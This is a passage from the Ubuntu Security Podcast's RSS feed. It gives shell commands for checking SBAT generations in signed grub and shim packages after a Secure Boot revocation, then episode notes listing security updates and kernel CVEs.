</span></span><span style="display:flex;"><span>grub.ubuntu,2,Ubuntu,grub2,2.12-5ubuntu4,https://www.ubuntu.com/
</span></span><span style="display:flex;"><span>grub.peimage,2,Canonical,grub2,2.12-5ubuntu4,https://salsa.debian.org/grub-team/grub/-/blob/master/debian/patches/secure-boot/efi-use-peimage-shim.patch
</span></span></code></pre></div><div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>rm -rf grub2-signed
</span></span><span style="display:flex;"><span>mkdir grub2-signed
</span></span><span style="display:flex;"><span>pushd grub2-signed &gt;/dev/null <span style="color:#f92672">||</span> exit
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">for</span> rel in focal jammy noble; <span style="color:#66d9ef">do</span>
</span></span><span style="display:flex;"><span>  mkdir $rel
</span></span><span style="display:flex;"><span>  pushd $rel &gt;/dev/null <span style="color:#f92672">||</span> exit
</span></span><span style="display:flex;"><span>  pull-lp-debs grub2-signed $rel-security 1&gt;/dev/null 2&gt;/dev/null <span style="color:#f92672">||</span> pull-lp-debs grub2-signed $rel-release 1&gt;/dev/null 2&gt;/dev/null
</span></span><span style="display:flex;"><span>  dpkg-deb -x grub-efi-amd64-signed*.deb grub2-signed
</span></span><span style="display:flex;"><span>  echo $rel
</span></span><span style="display:flex;"><span>  echo -----
</span></span><span style="display:flex;"><span>  find . -name grubx64.efi.signed -exec objdump -j .sbat -s <span style="color:#f92672">{}</span> <span style="color:#ae81ff">\;</span> | tail -n +5 | xxd -r
</span></span><span style="display:flex;"><span>  popd &gt;/dev/null <span style="color:#f92672">||</span> exit
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">done</span>
</span></span><span style="display:flex;"><span>popd &gt;/dev/null
</span></span></code></pre></div><div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-text" data-lang="text"><span style="display:flex;"><span>focal
</span></span><span style="display:flex;"><span>-----
</span></span><span style="display:flex;"><span>sbat,1,SBAT Version,sbat,1,https://github.com/rhboot/shim/blob/main/SBAT.md
</span></span><span style="display:flex;"><span>grub,4,Free Software Foundation,grub,2.06,https://www.gnu.org/software/grub/
</span></span><span style="display:flex;"><span>grub.ubuntu,1,Ubuntu,grub2,2.06-2ubuntu14.4,https://www.ubuntu.com/
</span></span><span style="display:flex;"><span>jammy
</span></span><span style="display:flex;"><span>-----
</span></span><span style="display:flex;"><span>sbat,1,SBAT Version,sbat,1,https://github.com/rhboot/shim/blob/main/SBAT.md
</span></span><span style="display:flex;"><span>grub,4,Free Software Foundation,grub,2.06,https://www.gnu.org/software/grub/
</span></span><span style="display:flex;"><span>grub.ubuntu,1,Ubuntu,grub2,2.06-2ubuntu14.4,https://www.ubuntu.com/
</span></span><span style="display:flex;"><span>noble
</span></span><span style="display:flex;"><span>-----
</span></span><span style="display:flex;"><span>sbat,1,SBAT Version,sbat,1,https://github.com/rhboot/shim/blob/main/SBAT.md
</span></span><span style="display:flex;"><span>grub,4,Free Software Foundation,grub,2.12,https://www.gnu.org/software/grub/
</span></span><span style="display:flex;"><span>grub.ubuntu,2,Ubuntu,grub2,2.12-1ubuntu7,https://www.ubuntu.com/
</span></span><span style="display:flex;"><span>grub.peimage,2,Canonical,grub2,2.12-1ubuntu7,https://salsa.debian.org/grub-team/grub/-/blob/master/debian/patches/secure-boot/efi-use-peimage-shim.patch
</span></span></code></pre></div><ul>
<li>So if all the current LTS releases have a grub with a generation number higher
than this, why are so many machines failing to boot?
<ul>
<li>It is not just grub that is the issue - shim itself also got revoked in the
same update
<a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2023-40547">https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2023-40547</a> - so
shim 15.8 (ie. 4th SBAT generation of shim) is now required</li>
<li>Unfortunately, the related updates for this shim in Ubuntu are still in the
process of being released -
<a href="https://bugs.launchpad.net/ubuntu/+source/shim/+bug/2051151">https://bugs.launchpad.net/ubuntu/+source/shim/+bug/2051151</a></li>
</ul>
</li>
</ul>
<!-- raw HTML omitted -->
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>rm -rf shim-signed
</span></span><span style="display:flex;"><span>mkdir shim-signed
</span></span><span style="display:flex;"><span>pushd shim-signed &gt;/dev/null <span style="color:#f92672">||</span> exit
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">for</span> rel in focal jammy noble; <span style="color:#66d9ef">do</span>
</span></span><span style="display:flex;"><span>  mkdir $rel
</span></span><span style="display:flex;"><span>  pushd $rel &gt;/dev/null <span style="color:#f92672">||</span> exit
</span></span><span style="display:flex;"><span>  pull-lp-debs shim-signed $rel-security 1&gt;/dev/null 2&gt;/dev/null <span style="color:#f92672">||</span> pull-lp-debs shim-signed $rel-release 1&gt;/dev/null 2&gt;/dev/null
</span></span><span style="display:flex;"><span>  dpkg-deb -x shim-signed*.deb shim-signed
</span></span><span style="display:flex;"><span>  echo $rel
</span></span><span style="display:flex;"><span>  echo -----
</span></span><span style="display:flex;"><span>  find . -name shimx64.efi.signed.latest -exec objdump -j .sbat -s <span style="color:#f92672">{}</span> <span style="color:#ae81ff">\;</span> | tail -n +5 | xxd -r
</span></span><span style="display:flex;"><span>  popd &gt;/dev/null <span style="color:#f92672">||</span> exit
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">done</span>
</span></span><span style="display:flex;"><span>popd &gt;/dev/null
</span></span></code></pre></div><div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-text" data-lang="text"><span style="display:flex;"><span>focal
</span></span><span style="display:flex;"><span>-----
</span></span><span style="display:flex;"><span>sbat,1,SBAT Version,sbat,1,https://github.com/rhboot/shim/blob/main/SBAT.md
</span></span><span style="display:flex;"><span>shim,3,UEFI shim,shim,1,https://github.com/rhboot/shim
</span></span><span style="display:flex;"><span>shim.ubuntu,1,Ubuntu,shim,15.7-0ubuntu1,https://www.ubuntu.com/
</span></span><span style="display:flex;"><span>jammy
</span></span><span style="display:flex;"><span>-----
</span></span><span style="display:flex;"><span>sbat,1,SBAT Version,sbat,1,https://github.com/rhboot/shim/blob/main/SBAT.md
</span></span><span style="display:flex;"><span>shim,3,UEFI shim,shim,1,https://github.com/rhboot/shim
</span></span><span style="display:flex;"><span>shim.ubuntu,1,Ubuntu,shim,15.7-0ubuntu1,https://www.ubuntu.com/
</span></span><span style="display:flex;"><span>noble
</span></span><span style="display:flex;"><span>-----
</span></span><span style="display:flex;"><span>sbat,1,SBAT Version,sbat,1,https://github.com/rhboot/shim/blob/main/SBAT.md
</span></span><span style="display:flex;"><span>shim,4,UEFI shim,shim,1,https://github.com/rhboot/shim
</span></span><span style="display:flex;"><span>shim.ubuntu,1,Ubuntu,shim,15.8-0ubuntu1,https://www.ubuntu.com/
</span></span></code></pre></div><ul>
<li>
<p>only noble has a new-enough shim in the security/release pocket - both focal
and jammy have the older one - but the new 4th generation shim is currently
undergoing testing in the -proposed pocket and will be released next week</p>
</li>
<li>
<p>until then, if affected, need to disable secure boot in BIOS then can either
wait until the new shim is released OR just reboot twice in this mode and
shim will automoatically reset the SBAT policy to the previous version,
allowing the older shim to still be used</p>
</li>
<li>
<p>then can re-enable Secure Boot in BIOS</p>
</li>
<li>
<p>Once new shim is released it will reinstall the new SBAT policy to revoke
its older version</p>
</li>
<li>
<p>One other thing, this also means the old ISOs won&rsquo;t boot either</p>
<ul>
<li>24.04.1 will be released on 29th August</li>
<li>upcoming 22.04.5 release will also have this new shim too</li>
<li>no further ISO spins planned for 20.04 - so if you really want to install
this release on new hardware, would need to disable secure boot first, do
the install, then install updates to get the new shim, and re-enable
secure boot</li>
</ul>
</li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://fosstodon.org/@ubuntusecurity">@ubuntusecurity@fosstodon.org</a>, <a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E235.mp3" length="17470779" type="audio/mpeg" /><itunes:duration>1060</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 234
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-234/</link>
          <pubDate>Fri, 09 Aug 2024 19:22:00 +0930 </pubDate>
          <dc:creator></dc:creator>
          <guid>04b1a93e2d4d7f4fea77cc02ee6d87880ec672bd9ebf8b726787a02b2d62a6af6373dfcf2df8c259b2e85c3b8c7fd45b1fb30bbf960b7e48fcd2cdb6b0013d61</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 234</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          This week we take a deep dive behind-the-scenes look into how the team handled a
  recent report from Snyk's Security Lab of a local privilege escalation
  vulnerability in `wpa_supplicant` plus we cover security updates in Prometheus...
        
        ]]></itunes:subtitle>
        <itunes:summary>  This week we take a deep dive behind-the-scenes look into how the team handled a
  recent report from Snyk's Security Lab of a local privilege escalation
  vulnerability in `wpa_supplicant` plus we cover security updates in Prometheus
  Alertmanager, OpenSSL, Exim, snapd, Gross, curl and more.
  </itunes:summary>
        <description>  This week we take a deep dive behind-the-scenes look into how the team handled a
  recent report from Snyk's Security Lab of a local privilege escalation
  vulnerability in `wpa_supplicant` plus we cover security updates in Prometheus
  Alertmanager, OpenSSL, Exim, snapd, Gross, curl and more.
  </description>
        <googleplay:description>  This week we take a deep dive behind-the-scenes look into how the team handled a
  recent report from Snyk's Security Lab of a local privilege escalation
  vulnerability in `wpa_supplicant` plus we cover security updates in Prometheus
  Alertmanager, OpenSSL, Exim, snapd, Gross, curl and more.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>This week we take a deep dive behind-the-scenes look into how the team handled a
recent report from Snyk&rsquo;s Security Lab of a local privilege escalation
vulnerability in <code>wpa_supplicant</code> plus we cover security updates in Prometheus
Alertmanager, OpenSSL, Exim, snapd, Gross, curl and more.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>185 unique CVEs addressed</p>
<h3 id="usn-6935-1-prometheus-alertmanager-vulnerability--01-08">[<a href="https://ubuntu.com/security/notices/USN-6935-1">USN-6935-1</a>] Prometheus Alertmanager vulnerability (01:08)</h3>
<ul>
<li>1 CVEs addressed in Bionic ESM (18.04 ESM), Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-40577">CVE-2023-40577</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Stored XSS via the Alertmanager UI - alerts API allows to specify a URL which
should be able to be called interactively by the user from the UI - an
attacker instead could POST to this with arbitrary JavaScript which would then
get included in the generated HTML and hence run on users when viewing the UI</li>
<li>Fixed to validate this field is actually a URL before including in the
generated UI page</li>
</ul>
<h3 id="usn-6938-1-linux-kernel-vulnerabilities--02-05">[<a href="https://ubuntu.com/security/notices/USN-6938-1">USN-6938-1</a>] Linux kernel vulnerabilities (02:05)</h3>
<ul>
<li>31 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-35978">CVE-2024-35978</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35984">CVE-2024-35984</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35997">CVE-2024-35997</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26840">CVE-2024-26840</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-27020">CVE-2024-27020</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52752">CVE-2023-52752</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-47194">CVE-2021-47194</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-46960">CVE-2021-46960</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26884">CVE-2024-26884</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-36016">CVE-2024-36016</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52436">CVE-2023-52436</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-36902">CVE-2024-36902</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26886">CVE-2024-26886</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52469">CVE-2023-52469</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26923">CVE-2024-26923</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52444">CVE-2023-52444</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52620">CVE-2023-52620</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-46933">CVE-2021-46933</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35982">CVE-2024-35982</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52449">CVE-2023-52449</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26934">CVE-2024-26934</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26882">CVE-2024-26882</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26857">CVE-2024-26857</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-46932">CVE-2021-46932</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26901">CVE-2024-26901</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-25739">CVE-2024-25739</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-24859">CVE-2024-24859</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-24858">CVE-2024-24858</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-24857">CVE-2024-24857</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-46343">CVE-2023-46343</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-48619">CVE-2022-48619</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>4.4 - generic, AWS, KVM, Low Latency, Virtual</li>
</ul>
<h3 id="usn-6922-2-linux-kernel-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6922-2">USN-6922-2</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>4 CVEs addressed in Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-25739">CVE-2024-25739</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-24859">CVE-2024-24859</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-24858">CVE-2024-24858</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-24857">CVE-2024-24857</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>6.5 lowlatency</li>
</ul>
<h3 id="usn-6926-2-linux-kernel-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6926-2">USN-6926-2</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>30 CVEs addressed in Trusty ESM (14.04 ESM), Bionic ESM (18.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-52620">CVE-2023-52620</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52444">CVE-2023-52444</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26901">CVE-2024-26901</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52449">CVE-2023-52449</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-27013">CVE-2024-27013</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26934">CVE-2024-26934</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35978">CVE-2024-35978</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-27020">CVE-2024-27020</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52469">CVE-2023-52469</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35982">CVE-2024-35982</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35997">CVE-2024-35997</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52443">CVE-2023-52443</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-36902">CVE-2024-36902</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26857">CVE-2024-26857</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-36016">CVE-2024-36016</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52436">CVE-2023-52436</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52752">CVE-2023-52752</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26886">CVE-2024-26886</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35984">CVE-2024-35984</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52435">CVE-2023-52435</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26840">CVE-2024-26840</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26923">CVE-2024-26923</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26882">CVE-2024-26882</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26884">CVE-2024-26884</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-25744">CVE-2024-25744</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-25739">CVE-2024-25739</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-24859">CVE-2024-24859</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-24858">CVE-2024-24858</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-24857">CVE-2024-24857</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-46343">CVE-2023-46343</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>4.15 Azure</li>
</ul>
<h3 id="usn-6895-4-linux-kernel-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6895-4">USN-6895-4</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>100 CVEs addressed in Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-26802">CVE-2024-26802</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26664">CVE-2024-26664</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52880">CVE-2023-52880</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26695">CVE-2024-26695</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-27416">CVE-2024-27416</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26714">CVE-2024-26714</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26603">CVE-2024-26603</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26920">CVE-2024-26920</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26736">CVE-2024-26736</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26593">CVE-2024-26593</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26922">CVE-2024-26922</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26600">CVE-2024-26600</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26702">CVE-2024-26702</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26782">CVE-2024-26782</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26685">CVE-2024-26685</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26691">CVE-2024-26691</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26734">CVE-2024-26734</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26822">CVE-2024-26822</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35833">CVE-2024-35833</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26792">CVE-2024-26792</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26674">CVE-2024-26674</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26889">CVE-2024-26889</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26712">CVE-2024-26712</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26917">CVE-2024-26917</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26919">CVE-2024-26919</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52637">CVE-2023-52637</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26700">CVE-2024-26700</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26661">CVE-2024-26661</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26926">CVE-2024-26926</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52631">CVE-2023-52631</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26679">CVE-2024-26679</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26798">CVE-2024-26798</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26667">CVE-2024-26667</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26689">CVE-2024-26689</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26681">CVE-2024-26681</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26910">CVE-2024-26910</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26828">CVE-2024-26828</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26790">CVE-2024-26790</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26606">CVE-2024-26606</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26825">CVE-2024-26825</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26677">CVE-2024-26677</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26722">CVE-2024-26722</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26923">CVE-2024-26923</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26803">CVE-2024-26803</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26898">CVE-2024-26898</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52642">CVE-2023-52642</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26660">CVE-2024-26660</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26716">CVE-2024-26716</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52645">CVE-2023-52645</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26602">CVE-2024-26602</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26711">CVE-2024-26711</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26826">CVE-2024-26826</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26601">CVE-2024-26601</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26890">CVE-2024-26890</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26698">CVE-2024-26698</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26693">CVE-2024-26693</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26665">CVE-2024-26665</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26676">CVE-2024-26676</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26824">CVE-2024-26824</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26838">CVE-2024-26838</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26720">CVE-2024-26720</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26666">CVE-2024-26666</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26718">CVE-2024-26718</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26723">CVE-2024-26723</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26675">CVE-2024-26675</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26680">CVE-2024-26680</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26642">CVE-2024-26642</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26710">CVE-2024-26710</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26696">CVE-2024-26696</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26748">CVE-2024-26748</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26717">CVE-2024-26717</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26735">CVE-2024-26735</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26916">CVE-2024-26916</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26697">CVE-2024-26697</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26829">CVE-2024-26829</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26715">CVE-2024-26715</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26694">CVE-2024-26694</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26830">CVE-2024-26830</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26726">CVE-2024-26726</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26719">CVE-2024-26719</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26820">CVE-2024-26820</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26707">CVE-2024-26707</a> <!-- raw HTML omitted --></li>
